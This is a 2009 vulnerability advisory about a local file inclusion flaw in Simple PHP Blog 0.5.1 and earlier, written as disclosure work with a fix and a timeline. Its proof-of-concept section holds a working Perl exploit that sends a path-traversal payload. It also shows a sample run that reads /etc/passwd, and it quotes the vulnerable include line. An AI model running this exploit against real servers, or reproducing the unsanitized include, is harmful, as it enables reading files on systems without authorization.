============================================INTERNET SECURITY AUDITORS ALERT 2009-005
- Original release date: March 2nd, 2009
- Last revised: December 18th, 2009
- Discovered by: Juan Galiana Lara
- Severity: 6.8/10 (CVSS scored)
============================================
I. VULNERABILITY
-------------------------
Simple PHP Blog <= 0.5.1 Local File Include vulnerability
II. BACKGROUND
-------------------------
Simple PHP Blog is a blog system does not requires database setup, and
is very easy to install.
III. DESCRIPTION
-------------------------
Simple PHP Blog <= 0.5.1 is affected by a Local File Include
vulnerability in 'languages_cgi.php' due to parameter 'blog_language1'
is not properly sanitized.
IV. PROOF OF CONCEPT
-------------------------
The affected code:
62 require_once('languages/' . $_POST[ 'blog_language1' ] .
'/strings.php');
Exploit:
#!/usr/bin/perl
# Local File Include Exploit
# Simple PHP Blog <= 0.5.1
# jgaliana isecauditors=dot=com
# Internet Security Auditors
use LWP::UserAgent;
if ($#ARGV < 3) { die("Usage: $0 "); }
$ua = LWP::UserAgent->new;
$ua->agent("Simple PHP Blog Exploit ^_^");
$ua->default_header('Cookie' => "sid=$ARGV[3]");
my $req = new HTTP::Request POST =>
"http://$ARGV[0]$ARGV[1]/languages_cgi.php";
$req->content_type('application/x-www-form-urlencoded');
$req->content("blog_language1=../../../../..$ARGV[2]%00");
my $res = $ua->request($req);
if ($res->is_success) {
print $res->content;
} else {
print "Error: " .$res->status_line, "\n";
}
$ perl simple.pl example.com /blog /etc/passwd |head -1
root:*:0:0:root:/root:/bin/bash
The bug can be exploited with or without 'magic_quotes_gpc', but note
that if magic_quotes_gpc is set to Off, an attacker can view any file,
adding a '\0' character like /etc/passwd, if not only can include php
files, allowing to execute any local php files.
V. BUSINESS IMPACT
-------------------------
The impact is the attacker can read arbitrary files in the context of
the webserver and execute arbitrary local php scripts.
VI. SYSTEMS AFFECTED
-------------------------
Versions prior and including 0.5.1 are affected
In order to patch the application the function file_exists() and
basename() must be added to the affected code.
VII. SOLUTION
-------------------------
Change line 62 of languages_cgi.php in order to filter $_POST[
'blog_language1' ] variable.
if (ereg('^[a-zA-Z0-9_]+$', $_POST[ 'blog_language1' ]))
require_once('languages/' . $_POST[ 'blog_language1' ] . '/strings.php');
VIII. REFERENCES
-------------------------
http://www.simplephpblog.com
http://sourceforge.net/projects/sphpblog/
http://www.isecauditors.com
IX. CREDITS
-------------------------
This vulnerability has been discovered and reported
by Juan Galiana Lara (jgaliana (at) isecauditors (dot) com).
X. REVISION HISTORY
-------------------------
March 02, 2009: Initial release.
December 18, 2009: Last revision.
XI. DISCLOSURE TIMELINE
-------------------------
March 02, 2009: Vulnerability acquired by
Internet Security Auditors (www.isecauditors.com)
March 03, 2009: Notified to developer. No response.
December 13, 2009: Notified again. No response.
December 18, 2009: Added mitigation solution and sent to lists.
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information.